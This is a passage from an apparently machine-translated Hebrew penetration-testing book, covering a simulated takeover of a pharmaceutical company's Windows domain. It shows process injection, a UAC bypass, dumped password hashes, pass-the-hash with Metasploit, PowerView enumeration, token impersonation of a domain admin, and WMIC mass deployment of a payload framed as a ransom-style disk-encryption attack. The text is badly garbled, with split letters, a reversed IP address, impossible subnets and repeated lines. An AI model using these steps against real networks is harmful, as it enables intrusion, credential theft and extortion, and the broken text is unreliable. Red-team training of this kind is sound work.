‫היעד‪.‬‬
‫קריאה לממ ש ק ה‪ API -‬ש ל )(‪ VirtualAllocEx‬כדי לה קצות זי כרון ‪RWX‬‬
‫) קריאה‪ ,‬כתי בה‪ ,‬ביצוע( בתה ליך היעד‪.‬‬
‫קריאה לממ ש ק ‪-API‬ה ש ל )(‪ WriteProcessMemory‬כדי ל כתו ב את המ טען ביעד‬
‫זי כרון ש ט ח זי כרון ויר טוא לי‪.‬‬

‫קריאה ל‪ CreateRemoteThread() API -‬כדי להפעי ל את בד ל הזי כרון‬
‫ה חד ש שנוצר עם המ טען המוזר ק ב שר שור חד ש‪.‬‬
‫סיום תה ליך ‪Meterpreter‬הרא שוני‪.‬‬
‫הע ברת תה לי כים שימו שית גם בתר חי שים א חרים‪ .‬אי לו היינו מנצ ליםיעד באמצעות‬
‫‪ Adobe PDF,‬למ ש ל‪ ,‬היינו מא בדים את המע טפת ש לנו ברגע שהיעד נ סגר את ‪Adobe,‬‬
‫וע לידי הגירה נו כ ל להימנע מ כך‪.‬‬
‫כעת‪ ,‬כ שנו כ ל ל כתו ב לא ח סון המ קומי‪ ,‬נו כ ל להתמ שך ) ל שרוד את חו לים מ חד ש( ע לידי‬
‫הת קנת סו כן ‪ C2‬כדי להע ביר את ת חנת הע בודה ת חת פי קודנו ו ש לי טתנו; עם זאת‪ ,‬זה‬
‫לא ה כר חי בהת ח ש ב ב כך ש במ קרה זה ה בדי קה היא פנימית ל ח לו טין‪ .‬כמו כן‪ ,‬בדרך‬
‫כ ל ל מומ לץ לע שות זאת כמ שתמ ש ניהו לי ו לא כמ שתמ ש צנוע‪ ,‬כך שאם ברצונך להפעי ל‬
‫פ קודות דרך ‪ C2‬מאו חריותר‪ ,‬תו כ ל לע שות זאת עם הר שאות אדמין‪.‬‬
‫נ ס קור את המו שגים וה ט כני קות בה ס למה ש ל ז כויותיתר בפר ק ה בא‪ .‬עם זאת‪ ,‬באג‬
‫פ שו ט ש ל ה ס למה ש ל הר שאות מ קומיות הוא כ ל מה שנדר ש כאן כדי לתת לנו ז כויות‬
‫ניהו ל וגי שה לנתונים שימו שיים כמו גי בו ב סי סמה שי כו ל ל שמ ש כדי להר חי ב את‬
‫הה שפעה ש לנו ע ל שאר הר שת‪.‬‬
‫ההת קפה ש בה נ שתמ ש היא מת קפת הגנת ‪ UAC Bypass Bypass VBS,‬כפי שמוצג‬
‫באיור ‪4.14.‬‬
‫איור ‪4.14:‬ניצו ל פגיעות ‪ -ScriptHost‬ב כדי לה ס לים למער כת‪.‬‬
‫הת קפות א לו פוע לות ל לא ר ב ב כנגד מ בנה ‪Windows 7‬ת חת הת קפה ‪(7601).‬‬
‫היתרונות ש ל אדמין‬
‫כעת‪ ,‬לא חר ש ס כן את המ ח ש ב הזה לרמת המנה ל‪ ,‬נת קין את סו כן ‪ C2‬ונ ש ליך את‬
‫‪-hash‬ה ש ל ה סי סמה ע בור המ שתמ שים המ קומיים‪ .‬למרות ש כ ברי ש לנו גי שה ב לתי‬
‫מוג ב לת לת חנת ע בודה זו‪ ,‬הם ע שויים להיות שימו שיים במ קומות א חרים‪ ,‬במיו חד מ כיוון‬
‫שהר בה ארגונים מ שתמ שים ב ח ש בון מנה ל מ קומי א חד ספציפי לתמי כה ט כנית ו לא חר‬
‫מ כן דו חפים תו כנה ל שו ל חן הע בודה‪ .‬אם היינו מצ לי חים לה שיג אותם‪ ,‬אז התנועה‬
‫הצידית בר ח בי המיזם תהיה הר בהיותר ק לה‪.‬‬
‫בארגונים שמ שתמ שים באימות ‪ )NTLM‬ש ב חנויות ‪Windows‬זה כמע ט כו לם(‪ ,‬בהנ חה‬
‫ש קיים ח ש בון כזה‪ ,‬לא נצ טרך לפצ ח את ‪-hash‬ה ש לו כדי לה שתמ ש בו‪ ,‬ש כןי ש מת קפה‬
‫שנ קראת "‪ "Pass the Hash‬ש בה מ ספי קה לה חזי ק את ‪-hash‬ה ש ל ה סי סמה כדי‬
‫לה שתמ ש בה כדי להי כנ ס‬
‫למאר חים א חרים בר שת‪ .‬עוד ע ל כך ב קרו ב‪ .‬בינתיים‪ ,‬אני אוה ב ל ק ב ל את ה סי סמאות‬
‫ו ש קו ל לפיצו ח אותן תרגי ל ראוי‪.‬י ש הר בה כ לים ו ט כני קות ש בהן אתהי כו ל לה שתמ ש‬
‫לפיצו ח סי סמאות ‪-‬אני אוה ב את ג'ון המר ט ש‪ ,‬א ב ל זה א חד מני ר בים‪ .‬זו ת קופה‬
‫א חרת ש בה הע ברת תה לי כים היא רגי לה‪ .‬אנ חנוי כו לים לע בור לתה ליך ‪lsass.exe‬‬
‫ו לה ש ליך גי בו ב שמור ב לי לגעת בדי ס ק‪ ,‬וזו דוגמה נו ספת ל חו סר התו ח לת ש ל מה‬
‫שנ קרא חומות א ש ש ל די ס ק ק שי ח‪.‬‬
‫‪pentestuser:502:E52CAC67419A9A224A3B108F3FA6CB6D:047310f22e642465092c42b4ef844‬‬
‫אור ח‪::: 0c980c0e7d95c37b139ea61d0efc6d13:ee40415b534b3daaee40415b534b3daa:105:‬‬
‫‪pharmadmin:500:047310f22e642465092c42b4ef84490b:ecbbacc2fcaf2e07045b500d2a57ed‬‬
‫ע כ שיויהיה זמן טו ב לזרו ק את כ ל המאר חים מה‪ Directory. AD evitcA-‬לא הו ל כת‬

‫לה כי ל ה כ ל‪ ,‬א ב ל זה הימור טו ב ש כ ל המער כות שהן ח ל ק מת שתית היער‪/‬דומייןייר שמו‬
‫שם‪ .‬זה לפ חות כ ל ת חנות הע בודה וה שרתים ש ל ‪ Windows XP/2000‬ואי לך‪ .‬הדרך‬
‫המהירה וה ק לה ביותר לע שות זאת היא באמצעות ס קריפ ט ‪ PowerView‬ש בד קנו‬
‫קודם ל כן ב ספר‪:‬‬
‫‪ C:> powershell.exe -nop -exec‬עו קף‬
‫>\‪PS C:‬יי בוא‪-‬מודו ל ‪ powerview.ps1 PS C:\> Get-NetComputers | Out-File -/.‬קידוד ‪output.txt‬‬

‫‪ascii‬‬
‫זו לא בי קורת מ קיפה ש ל כ ל ת שתית הר שת‪-dump .‬ה לאי כי ל ‪*nix boxes,‬נת בים‪,‬‬
‫מתגים‪ ,‬הת קנים מ שו בצים ו כו'‪ ,‬א ב ל זו נ קודת הת ח לה מצוינת לת חו שה ש ל איך‬
‫הר שת נראית‪.‬‬
‫עם זאת‪ ,‬אם נזרו ק את ר שימת הדומיינים ש ל ‪Windows,‬נו כ ל לראות שהת שתית‬
‫מ חו ל קת גם לפי מדינה‪:‬‬
‫‪ C:> powershell.exe -nop -exec‬עו קף‬
‫>\‪PS C:‬יי בוא‪-‬מודו ל ‪ powerview.ps1 PS C:\> Get-NetDomain | Out-File -/.‬קידוד ‪domains.txt‬‬

‫‪ascii‬‬
‫ְ ּב רִי טַנִיָה‬
‫‪GER‬‬
‫‪AU‬‬
‫‪FR‬‬
‫‪DK‬‬
‫זה‬
‫‪INX‬‬
NL
IN
WIB
‫מ ח קר ופיתו ח‬
ESP
:‫אנוי כו לים גם לר שום מאר חים ספציפיים ל כ ל ת חום מ סוים‬

<‫>נ קצץ ל קיצור‬
‫מאר חים ב ברי טניה‬
ukmail02.uk.pharma.com euportal.uk.pharma.com
pharmUK123. uk.pharma.com ukutil01.uk.pharma.com
pharmUK110.uk.pharma.com pharmUK17.uk.pharma.com
uksql01.uk.pharma.com pharmUK80.uk.pharma.com
UKSQL02.uk.pharma.com pharmUK13 .uk.pharma.com
UKDC01.uk.pharma.com ukmail01.uk.pharma.com
IT ‫מאר חי‬
pharmit52.it.pharma.com
pharmIT21.it.pharma.com
ITSQL01.it.pharma.com
itmail01.it.pharma.com
itnas02.it.pharma.com
itsql02.it.pharma.com
itnas01 .it.pharma.com
itterm01.it.pharma.com
itutil01.it.pharma.com
itdc02.it.pharma.com
ITTERM02.it.pharma.com
itdc01.it.pharma.com
nasd15b10.it.pharma.com
pharmITLT03.it.pharma.com
‫‪pharmit57.it.pharma.com‬‬
‫‪pharmit53.it.pharma.com‬‬
‫‪pharmIT55.it.pharma.com‬‬
‫אני לא ממ ליץ למפות את הר שת ב שום דרך ר שמית‪ ,‬ש כן זה הו לך לע שות‬

‫לייצר הר בה תע בורת ‪-SNMP‬ו ‪ ICMP‬ל כ ל הפ חות‪ ,‬שהיא רוע שת ו‬
‫מְי ו ָּת ר‪ .‬אנ חנו רוצים להי שאר מת חת לרדאר וי ש לנו את כ ל הנתונים שאנ חנו צרי כים‬
‫ל ק ב ל ה ח ל טות מו ש כ לות לג בי מה לת קוף א חר כך‪.‬‬
‫כדי ל ק ב ל את טוו חי הר שת המאו כ ל סים‪,‬י ש צורך ת חי לה להמיר את שמות המאר חים‬

‫ל כתו בות ‪IP.‬זהו ס קריפ ט ‪ PowerShell‬מהיר ומ לו כ לך לע שות בדיו ק את זה‪:‬‬
‫{ ))‪foreach ($computer in (get-content C:\hosts.txt‬‬

‫נ ס וֹת}‬
‫לְ ַ‬
‫‪[system.net.Dns]::GetHostAddresses($computer) | Foreach-Object‬‬
‫{‬
‫‪add-content -path C:\hosts-ips.txt -value‬‬
‫")‪"$($_.IPAddressToString‬‬
‫} } לתפו ס {‬
‫}‬
‫}‬
‫ע לידי הצ ל בה ש ל פ ל ט זה‪ ,‬מת ברר שהאר כי ט ק טורה כן‬

‫מ חו ל ק ל שני טוו חי ‪ IP‬עי קריים‪ .‬הרא שון הוא ‪192.168.0,‬המ חו ל ק ב‪24/-‬‬
‫ב לו קים לפי מדינה‪.‬‬
‫‪192.168.0.0/16‬‬ ‫‪ =NC‬ברי טניה‬
‫‪192.168.40.0/24‬‬ ‫‪CN=GER‬‬
‫‪192.168.12.0/24‬‬ ‫‪CN=AU‬‬
‫‪192.168.30.0/24‬‬ ‫‪CN=FR‬‬
‫‪.0/24‬‬ ‫‪CN=DK‬‬
‫‪192.168.65.0/21629.1‬‬ ‫‪CN=IT‬‬
‫‪192.168.65.0/21629‬‬ ‫‪CN=NL‬‬
‫‪192.168.55.0/24‬‬ ‫‪CN=IN‬‬
‫‪192.168.75.0/24‬‬ ‫‪CN=WIB‬‬
‫‪192.168.10.0/24‬‬ ‫‪CN=RD‬‬
‫‪192.168.45.0/24‬‬ ‫‪CN=ESP‬‬
‫‪192.168.0.0/24‬‬ ‫‪=NC‬ארה" ב‬
‫שי בו ט ר שת מ שנה אופייני‬

‫בהת ח ש ב במאר חים ה ספציפיים לת חום‪ ,‬נראה ש כ ל א חד מה טוו חים ה ל לו הוא רופף‬
‫מ שו ב ט מת בנית עם אותה מינו ח שמות מאר ח‪ .‬כ ל מדינה‬
‫י ש לו ב קרי ת חום מ ש לו‪ ,‬שרת דואר‪ ,‬שרת ק בצים ות חנות ע בודה מ ש לו‪ .‬ה‬
‫י ש לו ב קרי ת חום מ ש לו‪ ,‬שרת דואר‪ ,‬שרת ק בצים ות חנות ע בודה מ ש לו‪ .‬ה חריג ל כך הוא‬
‫‪ 190.168.0.0,‬שנראה כמוגדר כ‪ 16 /-‬מ סי בי א חד המתיי ח ס אך ור ק למאר חים בצפון‬
‫אמרי קה‪ .‬זוהי חריגה גדו לה מת קני עיצו ב ר שת פנימיים ו לא ברור מדוע זהיו שם בצורה זו‪,‬‬
‫לאור ההי ס טוריה ש ל ה ח ברה שמ קורה באירופה‪.‬‬
‫הייתי מ שער ש ק טע הר שת האמרי קאי "הוד ב ק" לא חר מ כן ומעו לם לא הוע בר כראוי‪.‬‬

‫ד ברים כא לה קורים לעתים קרו בות למדי‪ .‬הד בר ה ח שו ב כעת הוא שאנויודעים שי ש‬
‫מ ספר דומיינים‪ ,‬אנויודעים כיצד הם מוגדרים‪ ,‬ואנ חנויודעים שהם מנוה לים כ כ ל הנראה‬
‫באופן מ קומי עם ח ש בונות דומיינים מ קומיים שונים ועם מוד ל אמון חופף‪ .‬אנ חנוי כו לים‬
‫לת כנן את ההת קפה ש לנו ע כ שיו עם קצת דיו ק‪.‬‬
‫ש חזור סי סמאות בהנ חה ש לא הצ ל חנו לפענ ח את ה‪ shsah-‬ש ל ה סי סמאות ש ש חזרנו‬

‫ממאר חי ה בדי קה המ קומיים ) לפ חות בתוך מ סגרת זמן ס בירה תוך שימו ש במת קפת‬
‫מי לון‪ ,‬כו ח ג ס ו ט ב לאות ק שת בענן(‪ ,‬ה כ ל לא א בוד‪ .‬קיימת הת קפה מתועדת הי ט ב‬
‫במער כת ההפע לה ‪ Windows‬ש בה אתהי כו ל ל בצע אימות מר חו ק למאר ח א חר‬
‫באמצעות ‪-hash‬ההמוצפן ב ל בד‪ ,‬מ ב לי שתצ טרך לדעת את ה ט ק ס ט הפ שו ט ) כמו‬
‫ש קורה כמו בן בדרך כ ל ל(‪ .‬המת קפה מנצ לת חו ל שתיי שום בפרו טו קו ל האימות ב כך‬
‫ש‪ shsah-‬ש ל ה סי סמה לא מומ ל חות‪ ,‬ו ל כן נ שארות ס ט טיות מ ס שן להפע לה עד ל שינוי‬
‫ה בא ש ל ה סי סמה‪ .‬אם כן‪ ,‬אם ל ח ש בון ניהו לי א חד בת חנת ע בודה א חתי ש את אותה‬
‫סי סמה כמו ה סי סמה הניהו לית במ ח ש ב שאנו מנ סים לג שת א ליו‪ ,‬איננו צרי כים לדעת את‬
‫ה סי סמה‪ ,‬אנו ר ק צרי כים להיות בר שותנו ‪-hash.‬ה‬
‫ה שימו ש ב‪Metasploit -‬הופך את זה לפ שו ט למדי‪ .‬כפי ש כ בר ראית‪ Metasploit ,‬מא ח סנת את‬
‫כ ל ‪-hash‬ה שהיא מ סוג לת לר כו ש ל שימו ש מאו חריותר‪ .‬כ ל מה שאנ חנו צרי כים לע שות כדי לע שות‬
‫שימו ש חוזר ‪ -hash‬בהוא להו סיף מ כונתיעד לממ ש ק ‪ Armitage,‬ל ל חוץ ע ליו באמצעות ל חצן‬
‫הע כ בר הימני ו ל ב חור ‪ psexec,‬כפי שמוצג באיור ‪4.15.‬‬
‫איור ‪4.15: Armitage‬הופך הר בה מ שימות מייגעות לעניין ב ל חיצה א חת‪.‬‬

:‫ מא שר הת קפה מוצ ל חת‬Metasploit ‫פ ל ט‬

SMBDomain => ITPHARMA23
SMBPass =>
SMBUser => pharmaadmin [*]
‫ניצו ל פוע ל‬aad3b435b51404eeaad3b435b51404ee:ecbbacc2fcaf2e07045b500d2a57ed4a
.‫כע בודת ר קע‬
...‫]*[ מת ח בר ל שרת‬
'pharmaadmin'... ‫ כמ שתמ ש‬ITPHARMA23 |544:96.86.861.291-‫]*[ מאמת ל‬
...‫ ביצוע המ טען‬PowerShell [*] 192.168.68.69:445 - ‫]*[ ב חירתיעד‬
!‫[ה שירות הת חי ל‬+] 192.168.68.69:445 -
‫ א ב ל מה‬,(!‫זה נותן לנו ש לי טה מ קומית ש ל מנה ל מער כת ע ל מער כת היעד )וזה נהדר‬
‫ זהיאפ שר לנו לע בור ע ל כ ל‬.‫שיהיה אפי לו טו ביותר הוא ל ק ב ל אי שורי ניהו ל דומיין‬
‫י ש טרי ק לע שות זאת אם אתהי כו ל למצוא ת חנת ע בודה או שרת שמנה ל דומיין‬.‫הר שת‬
‫זה‬PowerView, ‫ עם‬,‫ למר בה המז ל‬.‫מ חו בר א ליו ו שתו כ ל ל ק ב ל גי שת מנה ל מ קומי‬
:‫ ע לינו למנות את מנה לי הדומיין‬,‫ קודם כ ל‬.‫מהיר‬
"‫"מנה לי דומיין‬C:\> Invoke-StealthUserhunter -GroupName .‫ ב‬.‫נ‬
it.pharma.com: globaladmin
‫שם מ שתמ ש‬ UserDomain:
SessionFrom: 190.168.96.21 LocalAdmin: :‫שם מ ח ש ב‬
itmail01.it.pharma.com IP: 192.168.65.11
globaladmin : ‫ שם מ שתמ ש‬UserDomain : it.pharma.com

SessionFrom : 192.168.0.99 LocalAdmin : : ‫שם מ ח ש ב‬
itmail01.it.pharma.com IP
: 192.168.65.11
globaladmin :‫ שם מ שתמ ש‬UserDomain: it.pharma.com

SessionFrom: 192.168.0.99 LocalAdmin:
itterm01.it.pharma.com: :‫שם מ ח ש ב‬
192.168.65.13
IP
it.pharma.com : globaladmin
‫ שם מ שתמ ש‬UserDomain :
192.168.0.99 LocalAdmin: :‫שם מ ח ש ב‬

IP 192.168.65.32 SessionFrom:
itdc02.it.pharma.com:
LocalAdmin : : ‫ שם מ שתמ ש שם מ ח ש ב‬UserDomain : it.pharma.com : globaladmin

itdc01.it.pharma.com IP : 192.168.65.10 SessionFrom : 192.168.0.99
LocalAdmin : : ‫ שם מ שתמ ש שם מ ח ש ב‬UserDomain : it.pharma.com : globaladmin

itsql02.it.pharma.com IP : 192.168.65.63 SessionFrom : 192.168.0.99
192.168.0.99 LocalAdmin: :‫ שם מ ח ש ב‬globaladmin :‫ שם מ שתמ ש‬UserDomain: it.pharma.com

ITSQL01.it.pharma.com IP: 192.168.65.12 SessionFrom:
‫ כדי ל ק ב ל‬Windows API ‫ מ שתמ ש בפ קודות מ קוריות ש ל‬PowerView ,‫בדוגמה זו‬

.‫את המ שתמ שים המ חו ברים ע בור מ ח ש בי ת חום‬
‫ מ חו בר‬globaladmin ‫י ש מנה ל דומיין ב שם‬ITSQL01.it.pharma.com -‫נראה ש ל‬
‫ה כדי ל ס כן את‬-Hash" ‫ נ שתמ ש במת קפת מנה ל מ קומית "הע בר את‬,‫ שו ב‬.‫א ליו‬
‫ לר שום את כ ל הא סימונים הזמינים באותו‬Metasploit ‫המאר ח ו לא חר מ כן נ ביא את‬
:‫מאר ח‬
‫ה שתמ ש‬IT\pharmaadmin meterpreter > :‫ שם מ שתמ ש ב שרת‬meterpreter> getuid

> getuid meterpreter > list_tokens -u .‫ הצ ל חה‬...‫ב סתר טוען סיומת ג לי שה ב סתר‬
meterpreter
‫א סימוני מ ש ל חת זמינים‬
=======================================
‫\ שירות מ קומי‬YTIROHTUANT
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
IT\pharmaadmin
‫‪PHARMA\globaladmin‬‬
‫אנ חנוי כו לים לגנו ב את א סימון ההפע לה ש ל מנה ל הדומיין‪ ,‬מה שייתן לנו ש לי טה מ לאה‬
‫ע ל כ ל המאר חים ש ל הדומיין הזה‪.‬‬
‫‪meterpreter > impersonate_token PHARMA\globaladmin‬‬

‫]‪[+‬א סימון נציגות זמין‬
‫]‪[+‬הת חזה בהצ ל חה למ שתמ ש ‪PHARMA\globaladmin meterpreter > getuid‬‬
‫שם מ שתמ ש ב שרת‪PHARMA\globaladmin :‬‬
‫ה כנת ר שימת קניות‬

‫ב סדר‪ .‬בוא נ לך ל קניות‪ .‬היעד העי קרי ש לנו הוא עדיין נתוני עו בדים‪ ,‬א ב ל בהת ח ש ב בגי שה‬
‫הג בוהה ביותר ש לנו‪ ,‬אנ חנו חיי בים לעצמנו לא לה חמיץ הזדמנות לגני בת נתונים מ סי בית‪ .‬הד בר‬
‫הא חרון שאנ חנו רוצים לע שות ב ש ל ב זה הוא להת חי ל ליצור הפע לות מע טפת בודדות ע ל‬
‫מאר חים ב כ ל הת חום שנפרץ ש לנו‪.‬‬
‫י שיותר מדי מער כות וזהיצור פ טפו טים ח שודים בר שת‪ ,‬א ב ל ה כי ח שו ב ‪-‬זה לא ה כר חי‪ .‬מה‬
‫שאנ חנו רוצים ב ש ל ב הזה זה ר שימת קניות‪ ,‬ר שימה ע ל פני כ ל הת חום ש ל מי קום ק בצים‬
‫מעניינים‪.‬‬
‫זהי כו ל להיות כ ל מה שנרצה‪ ,‬א ב ל נני ח שאנ חנו מ חפ שים במיו חד מ סמ כי ‪Office Excel‬‬
‫‪ Microsoft‬במאר חים מרו ח קים‪ .‬פ קודת ‪ dir‬פ שו טה ת ספי ק במ קרה זה‪:‬‬
‫‪dir \\hostname\c$\*.xl* sb‬‬
‫ודא שאתה שומר את אפ שרויות שורת הפ קודה כך שהפ ל טי כי ל את הנתי ב המ לא; זהי ק ל‬
‫ע ל ס קריפ ט מאו חריותר כא שר אתהיודע מה אתה רוצה להעתי ק‪.‬‬
‫זה כמו בן ניתן להר ח בה ו ס קריפ ט ל ח לו טין‪ ,‬א ב ל כ כ ל שהר שת שת ש ליך ר ח בהיותר‪ ,‬כך ה חיפו שיי ק חיותר‬
‫זמן‪ .‬גי שה א חת היא חיפו ש בר שימת היעדים א חריעדי מ שא בי אנו ש פו טנציא ליים‪ ,‬אך המינו ח ש ל ת חנת‬
‫הע בודה מעורפ ל מאוד‪ .‬גי שה טו בהיותר היא לה שתמ ש ב לינ קדאין כדי למצוא את שמות העו בדים שעו בדים‬
‫במ ח ל קת מ שא בי אנו ש ו להצ לי ב את א לה עם ‪ dump‬ש ל מ שתמ שים מה‪ .DA-‬לא חר מ כן תו כ ל ל ק בוע לאיזו‬
‫ת חנת ע בודה המ שתמ ש מ חו בר‪ .‬אנו מוצאים ג ברת ב שם פראן סאמר ס שמייצגת מ שא בי אנו ש ג לו ב ליים ב סן‬
‫פרנ סי ס קו‪ .‬באמצעות ‪PowerView,‬אנו מג לים ש שם המ שתמ ש ש לה הוא ‪fransumm:‬‬
‫‪mdbusedfaults‬‬ ‫‪fransum@pharma.local :‬‬

‫‪userprincipalname‬‬ ‫‪: franumm : 83047038 :‬נ כון‬
‫‪usncreated‬‬
‫‪samaccountname‬‬
‫}…‪Members,OU=Groups,DC=pharma,DC=com‬‬
‫‪=pharma,DC=com,‬‬
‫סאמר ס ח בר ב‪:‬‬
‫‪CN=Security‬‬
‫תצוגה‪ :‬פראן‬
‫‪OWA‬‬
‫שם‬
‫‪Groups,DC=pharma,DC=com,‬‬ ‫‪CN=SP_Manf_PharmaShare_Technical,OU=Groups,DC‬‬
‫‪{CN=AX Requisition Users,OU=Groups,DC=phenomenex,DC=com,‬‬ ‫=‪CN=HR,OU‬‬
‫גם באמצעות ‪PowerView,‬אנו רואים ש‪ fransumm -‬מ חו בר ל‪-‬‬

‫‪pharma1845.pharma.com:‬‬
‫נ‪ .‬ב‪ C:\> Invoke-StealthUserhunter - .‬שם מ שתמ ש "‪"fransumm‬‬
‫‪ UserDomain : pharma.com : fransumm‬שם‬

‫מ שתמ ש שם מ ח ש ב ‪pharma1845.pharma.com :‬‬
‫‪190.168.34.12‬‬
‫‪: 190.168.34.12‬‬
‫הפע לת ‪ IP‬מ‪:‬‬
‫ש לם ל כ לוך! כעת אנו חוזרים ע ל פ קודת ‪-dir‬הה קודמת ש לנו ‪:‬‬

‫‪dir \\hostname\c$\*.xl* sb‬‬
‫‪C:\Users\fransumm\AppData\Local\Temp\Temp1_invbas3p0.zip\InvisibleBasic.xla‬‬
‫‪C:\Users\fransumm\Documents\Employee_complete_2016.xlsx‬‬
‫‪information v0.2.xlsx C:\Users\fransumm\Desktop\Onboarding\RFCDocv2.xlsx‬‬
‫‪C:\Users\fransumm\Desktop\Onboarding\Asset & subnet‬‬
‫כעת‪ ,‬כ שי ש לנו ש לי טה ע ל כ ל ר שת הנתונים ש ל ‪ Windows,‬ע לינו לה ח לי ט ע ל מת קפה‬

‫הר סנית מתאימה שי כו לה להת בצע בע ק בות ה חי לוץ ש לנו ש ל מידע היעד‪ .‬הדרך ה ק לה‬
‫והאמינה ביותר היא פרי סה המונית ש ל מער כת הצפנה ש ל כונן ש לם באמצעות אי שורי‬
‫מנה ל הדומיין עם מ שפ ט סי סמה ארוך ומתאים שה ח ברה לאי כ לה ל קוות לנ ח ש‪.‬‬
‫ברגע שהתו כנה הזו נד חפת ותת קין‪ ,‬נו כ ל לה קפיץ כ ל ת חנת ע בודה ו שרת ש ל ‪Windows‬‬
‫בר שת‪ .‬כא שר הםית חי לו שו ב‪ ,‬הםידר שו את מ שפ ט ה סי סמה כדי להמ שיך ברצף האת חו ל‬
‫ו) בהיעדר זאת( הם ב לתי ניתנים ל ש חזור ל ח לו טין‪ .‬מדו בר במת קפה מרו שעת שע לו לה גם‬
‫להפוך את ה ח ברה לפתו חה ל ס חי טה‪ .‬מי ליון דו לר ב בי ט קוין ע בור בי טוי ה סי סמה‪ ,‬למ ש ל‪.‬‬
‫עם זאת‪ ,‬זהו תרגי ל דוגמנות אז אנ חנו לא הו ל כים לע שות שום ד בר מזה‪ .‬זה מ ספי ק כדי‬
‫להדגים פגיעות ע לידי ד חיפת קו בץ בינארי מותאם אי שית לת חום היעד‪ .‬לדוגמה‪ ,‬כדי‬
‫למ קד ספציפית ל ברי טניה‪ ,‬נ בצע את הפעו לות ה באות‪.‬‬
‫רא שית ק ב ל מע טפת פ קודה עם אי שורי מנה ל דומיין‪:‬‬

‫רא שית ק ב ל מע טפת פ קודה עם אי שורי מנה ל דומיין‪:‬‬

‫‪Runas /user:domainuk@UK cmd‬‬
‫הפע ל את מת קין ‪ WMIC,‬שיאפ שר לנו לפרו ס תו כנה מר חו ק באופן ב לתי נראה ל לא כ ל‬

‫אינ טרא קציה נו ספת ש ל המ שתמ ש‪:‬‬
‫‪c:\> wmic‬‬
‫ב ש ל ב זה‪ ,‬אנ חנו ר ק צרי כים לציין ר שימה ש ל מ ח ש בייעד ונתי ב למ טען ש לנו‪:‬‬
‫"‪ > /node::@"c:\computers.txt‬קריאת המוצר ‪install true,"" , "c:\PathToYour\File.msi‬‬
‫אנ חנו סיימנו!‬
‫סי כום‬
‫פ שו ט ע ברנו ממ שתמ ש שו ל חני צנוע לגי שה מ לאה לדומיין תוך פ חות מ שעה‪ .‬מרגי ש ב טו ח?‬
‫אני מ קווה ש לא‪ .‬זה ב שום אופן לא תר חי ש מתו כנן‪,‬יי חודי או ק שה ל ש כפו ל ו כ ל ה כ לים‬
‫שהדגמתי כאן הם נ ח לת ה כ ל ל וזמינים באופן חופ שי‪ .‬הנ קודה הגדו לה כאן היא ‪ -Windows‬ש‬
‫אינה ס בי בה ס ל חנית אם אתה עצ לן בא ב ט חה‪ .‬גם אם אתה לא‪ ,‬אתהי כו ל להי כנ ס למים‬
‫חמים במהירות אם המ שתמ שים ש לךי כו לים לה ס לים את ההר שאות ש להם באופן מ קומי‪.‬‬
‫בתר חי ש ‪APT,‬זה לרו ב ר ק עניין ש ל זמן‪.‬‬
‫‪1.‬הורד ניצו ל קיים בצד ה ל קו ח‪ .‬שנה אותו כך שהואיע קוף את ש לך‬
‫פתרון האנ טי וירו ס המועדף‪ .‬ודא שזה עדיין עו בד‪.‬‬
‫‪2.‬הורד את המ כ שיר הויר טוא לי ‪Metasploitable v2.‬תרג ל ‪Metasploit‬נגדו וה כיר‬

‫את ה חוז קות וה חו ל שות ש לו‪.‬‬
‫פר ק ‪5‬‬
‫רו בים ות חמו שת‬
‫פר ק זה הוא דוגמה מעניינת לה ש ל כות הפו טנציא ליות מר חי קות ל כת ש ל אי ה ב ט חת‬
‫ה קניין הרו חני ש לך‪ .‬בעידן המודרני ש ל הרעיון ה כו ל ל לייצור או טומציה ש ל מוצרים‪,‬‬
‫או בדן אפי לו ש ל כמה ק בצי עיצו ב בעזרת מ ח ש ב )‪ (CAD‬מ ספי קים בפו טנציה כדי‬
‫לה ט ביע את הע ס ק ש לך‪ .‬ב שנים הא חרונות‪ ,‬ה שימו ש במער כות ב קרה נומרית‬
‫ממו ח ש בת )‪(CNC‬הפך לפופו לרי מאוד בת כנון וייצור ש ל נ ש ק‪ ,‬ש כן הצ בא מ ב ק ש‬
‫מער כות מור כ בותיותר ב שו ק צפוף ש בו בדרך כ ל ליז כה המציע הנמוך ביותר ב חוזה‬
‫הר כ ש‪.‬‬
‫מער כות ‪ CNC‬מ שמ שות לייצור המוני ש ל כ לי נ ש ק לפי מפר ט מדוי ק עם מינימום מו ח ל ט‬
‫ש ל אינ טרא קציה אנו שית ‪ -‬לפעמים ר ק הר כ בת ה ח ל קים שהו ש למו‪ .‬תופעת לוואי ש ל‬
‫גי שה זו היא שמער כות ‪CNC‬זמינות ב ק לות‪ ,‬זו לותי ח סית וי כו לות לייצר ה חזר מהיר ע ל‬
‫הה ש קעה‪.‬‬
‫זאת‪,‬י חד עם העו בדה שניתן ל שתף ב ק לות מ סמ כי הוראות ‪CNC‬הנ חוצים לנהיגת‬
‫מ כונות כא לה דרך האינ טרנ ט ו שע בודת נ ש ק ביתית ש ל ‪CNC‬הפ כה לת ח בי ב ני שה‬
‫ב קר ב פ ל חים מ סוימים באינ טרנ ט‪ ,‬הפו טנציא ל לא ר ק לאו בדן קניין רו חני א ב ל גם ע בור‬
‫התפ ש טות מ סי בית ברור‪ .‬בעתיד‪ ,‬הדפ סה ת לת מימדית מת קדמת ) כמונ ח ר ח ב ה כו ל ל‬
‫פ ל ס טי ק ומת כות מו ק ש חות( תהיה זמינה כמע ט ל כו לם‪ ,‬ו ס ביר להני ח שההג ב לה‬
‫ה חו קית ש ל כ ליירייה תהיה ב לתי אפ שרית למניעה )ראה איור ‪5.1) .‬‬
‫איור ‪5.1:‬תות חן רפאים מ בוזר בהגנה‪ .‬מ כונת ‪ CNC‬ב קוד פתו ח המיועדת לייצור מ ק ל טי‬
‫‪AR-15‬ת חתונים המוג ב לים ע ל פי ה חו ק הפדר לי‪.‬‬
‫מ קור‪https://ghostgunner.net/ :‬‬
‫רו בים‪ ,‬כדורים ופו לי טי קה‬
‫אם לא הייתם מנ ח שים ש כמה מהנ ש ק ה ק ל מהמת קדמות בעו לם מתו כננות ומיוצרות‬
‫ב ב לגיה‪ ,‬אתם לא ל בד‪ .‬הופתעתי לג לות שהר בה מ כ לי הנ ש ק ה חד שניים‪ ,‬הי קרים‬
‫והאו ל טרה‪-‬מודרניים ביותר מ קורם שם‪ .‬א לא אם כן אתה חו ב ב נ ש ק חם או סו חר נ ש ק‪,‬‬
‫כנראה ש לאידעת את זהיותר ממני‪ .‬אף ע ל פי כן‪ ,‬מ קורם ש ל הר בה מ כ לי הנ ש ק‬
